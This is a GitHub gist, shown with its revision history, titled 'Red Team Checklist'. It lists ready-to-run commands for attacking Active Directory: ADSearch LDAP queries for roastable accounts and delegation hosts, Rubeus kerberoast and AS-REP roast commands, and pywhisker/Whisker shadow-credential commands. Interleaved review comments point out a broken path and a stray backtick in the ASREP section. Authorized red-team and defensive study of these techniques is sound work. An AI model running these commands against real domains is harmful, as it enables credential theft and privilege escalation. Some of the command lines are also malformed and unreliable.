@swtornio
Last active February 15, 2025 06:33

Revisions

  1. swtornio revised this gist Feb 15, 2025. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion gistfile1.txt
    @@ -28,7 +28,7 @@ Find all computers permitted for constrained delegation (can also be found from

    ## Resource-based Constrained Delegation

    Check MachineAccountQuota
    Check MachineAccountQuota for quick win

    ## Shadow Credentials
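
Review bot: The reworded entry under "## Resource-based Constrained Delegation" still carries no query or attribute list, and "for quick win" does not say which MachineAccountQuota value counts as a finding, so the item can be ticked off without a reproducible result. Suggest stating what is read and what threshold matters in the entry itself, in the same "description line, then command line" form the hunk header's constrained-delegation entry uses.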

  2. swtornio created this gist Feb 15, 2025.
    38 changes: 38 additions & 0 deletions gistfile1.txt
    @@ -0,0 +1,38 @@
    # Red Team Checklist

    ## Kerberoasting

    Find SPNS (can also be found from ADExplorer snapshot)
    `C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName`

    Roast individually
    `C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:sqlsvc /nowrap`

    ## ASREP Roasting

    Find accounts without pre-auth enabled (can also be found from ADExplorer snapshot)
    `:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname`

    Roast individually
    `C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:sqlsvc /nowrap``

    ## Unconstrained Delegation

    Find all computers permitted for unconstrained delegation (can also be found from ADExplorer snapshot)
    `C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname`

    ## Constrained Delegation

    Find all computers permitted for constrained delegation (can also be found from ADExplorer snapshot)
    `C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json`

    ## Resource-based Constrained Delegation

    Check MachineAccountQuota

    ## Shadow Credentials

    If `msDS-KeyCredentialLink` is writable for this object, can obtain a TGT

    `pywhisker.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --target "$TARGET" --action "list"`
    `C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:dc$`
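
Review bot: The ADSearch line under "## ASREP Roasting" starts with `:\Tools\ADSearch\...` and is missing the drive letter that every other ADSearch line has (`C:\Tools\ADSearch\...`), and the Rubeus line right after it ends in a doubled backtick, which breaks the inline code span. Two smaller points: "Find SPNS" should read "Find SPNs", and the placeholders are inconsistent, since the pywhisker line uses `"$DOMAIN"`, `"$USER"` and `"$TARGET"` while the Rubeus and Whisker lines hardcode `/user:sqlsvc` (in both roasting sections) and `/target:dc$`. Pick one placeholder style so a copied line is never run against a leftover name.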